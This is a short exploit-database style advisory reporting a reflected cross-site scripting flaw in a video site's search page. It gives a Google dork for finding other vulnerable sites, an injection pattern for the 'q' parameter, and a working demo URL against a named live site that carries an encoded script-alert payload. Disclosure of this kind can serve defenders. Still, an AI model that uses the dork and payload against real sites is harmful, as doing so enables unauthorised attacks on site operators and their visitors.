****************************
#Exploit Title: VEDIO - Cross Site Scripting Vulnerability (XSS)
#Date: 2020-08-17
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://video.sportnk.ru
#Google Dork: inurl:"search.php?q="
#Tested On: windows 10
Proof of Concept:
1-Search dork
2-https://target/search.php?q=" > [XSS Inject Payload ]
Demo: https://video.sportnk.ru/search.php?q=Tante++mesum+sama+hewan%3CScRipT%3Ealert(%22XSS%22);%3C/ScRipT%3E
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************